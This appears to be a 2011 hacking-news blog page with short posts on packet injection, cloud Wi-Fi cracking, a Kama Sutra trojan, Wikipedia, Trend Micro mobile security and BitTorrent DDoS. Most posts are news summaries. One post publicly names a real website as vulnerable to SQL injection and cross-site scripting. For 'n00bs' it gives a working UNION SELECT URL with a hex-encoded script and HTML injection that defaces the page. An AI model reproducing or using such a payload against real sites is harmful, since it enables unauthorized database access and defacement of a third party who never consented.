This is featured post 2 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.

This is featured post 3 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.

Sunday, January 30, 2011
packet injection basics .
The Packet Injection basics presentation is an in-depth tutorial on various packet injection programming techniques. We will look at how to construct various headers and then bunch them together to form a complete packet and then how to send this packet over the network. This presentation is a necessary pre-requisite for all the other packet injection videos in this tutorial series.
Please download this file, before you view the presentation
source:securitytube....
Sunday, January 16, 2011
Hacker cracks W-LAN password in 20 mins using Amazon cloud
A German hacker says he cracked the wireless LAN password of his neighbour in 20 minutes – using the cloud computing power available on Amazon in a demonstration which he says should sensitise people and businesses to security issues.
Thomas Roth, described in Der Spiegel magazine as an IT security expert, will report on his experiment at next week’s Black Hat DC 2011 hacker conference in Washington.
The holder of a W-LAN password can not only spy on the network’s user, but also use the account to secretly start attacks on other servers, or initiate illegal downloads.
The cloud computing systems run not only by Amazon but also Google and Microsoft effectively rent out computing power. For companies which occasionally need such capacity, the idea is attractive as it saves them from...
Saturday, January 15, 2011
Kama Sutra virus dupes with sexy promise
Hackers are spreading a nasty computer virus with a file promising a PowerPoint presentation of sexual positions from the Kama Sutra, the security firm Sophos warns."Be careful what you do with that mouse," Graham Cluley of Sophos said in an online post."When you click on the file you do get to see a real PowerPoint presentation, but in the background a backdoor Trojan called Troj/Bckdr-RFM is installed which allows hackers to gain remote access to your computer."Once a computer is infected with the malicious software, the hacker can steal personal information and spy on users' activities or use the machine for nefarious deeds such as sending spam or attacking websites.In scant consolation, the booby-trapped file did present slides of more than a half dozen lovemaking techniques illustrated...
Wikipedia turns 10, looking towards India
Six years of Facebook , four years of twitter. And ten years of the site you probably got that information from. Wikipedia, the San Francisco-based online encyclopedia which completes a decade on Saturday, has become the default stop for anyone searching for information on the net. Currently receiving 410 million unique visitors a month, the fifth most in the world, it is aiming to hit the magic 1 billion figure in the next five years. That’s where India neatly fits into its plans. The Wikimedia foundation’s India chapter was officially recognised by the Karnataka government this week and among the 300 plus events scheduled to mark the ten years, more than 60 are in India. “Our main strategic focus right now is on India and other countries in the developing world. Massive numbers...
Friday, January 7, 2011
Android uses cloud security from Trend Micro
Trend Micro recently upgraded its security system for desktop computers to rely heavily on cloud-based detection and protection, and now it's bringing that same network to Android devices.Trend Micro Mobile Security for Android(Credit: Trend Micro)Trend Micro Mobile Security for Android secures your device in four ways. It offers a "safe surfing" feature that prevents phishing attacks and illicit access to your identity and banking information. It also powers the parental controls for Web site content blocking. There's a customized blacklist for call and text filtering, and a download guard that prevents malicious or fraudulent apps from installing on your device.Trend Micro is the first security company to extend its proprietary cloud-based...
Monday, January 3, 2011
bug found at kingtamil.com
The website kingtamil.com has been found to have sqli and xss vulnerability .
the bug was found by hussain .
details for the hackers:
vulnerable url:kingtamil.com/videos.php?id=45
no of columns : 7
visible columns 2,4,3.
details for the n00bs:
check the bug of the site , by visiting the following url .
http://kingtamil.com/videos.php?id=-45%20union%20select%201,concat(0x3C,0x73,0x63,0x72,0x69,0x70,0x74,0x3E,0x61,0x6C,0x65,0x72,0x74,0x28,0x27,0x62,0x75,0x67,0x20,0x66,0x6F,0x75,0x6E,0x64,0x20,0x62,0x79,0x20,0x72,0x61,0x73,0x63,0x61,0x6C,0x20,0x61,0x6E,0x64,0x20,0x68,0x75,0x73,0x73,0x61,0x69,0x6E,0x20,0x2D,0x2D,0x20,0x77,0x77,0x77,0x2E,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x20,0x27,0x29,0x3B,0x3C,0x2F,0x73,0x63,0x72,0x69,0x70,0x74,0x3E,0x3C,0x68,0x31,0x3E,0x42,0x75,0x67,0x20,0x66,0x6F,0x75,0x6E,0x64,0x20,0x62,0x79,0x20,0x3C,0x61,0x20,0x68,0x72,0x65,0x66,0x3D,0x22,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x77,0x77,0x77,0x2E,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x22,0x3E,0x77,0x77,0x77,0x2E,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x3C,0x2F,0x61,0x3E,0x3C,0x2F,0x68,0x31,0x3E),3,4,5,6,7;--
enjoy...
Saturday, January 1, 2011
using Bit Torrent as DDos attack tool
A recent talk at the Chaos Communications Congress revealed how BitTorrent swarms can be exploited to take down large websites with relative ease. A vulnerability in the technology behind so called trackerless torrents makes it possible for someone to trick downloaders of popular files into send thousands of requests to a webserver of choice, taking it down as a result. Basically, this turns BitTorrent into a very effective DDoS tool.
BitTorrent is one of the most effective technologies to transfer large digital files to many people at once. Unlike a central server, transfers actually tend to go faster as more people share the same files. This characteristic is one of the reasons why it has evolved into the dominant file-sharing platform in recent years....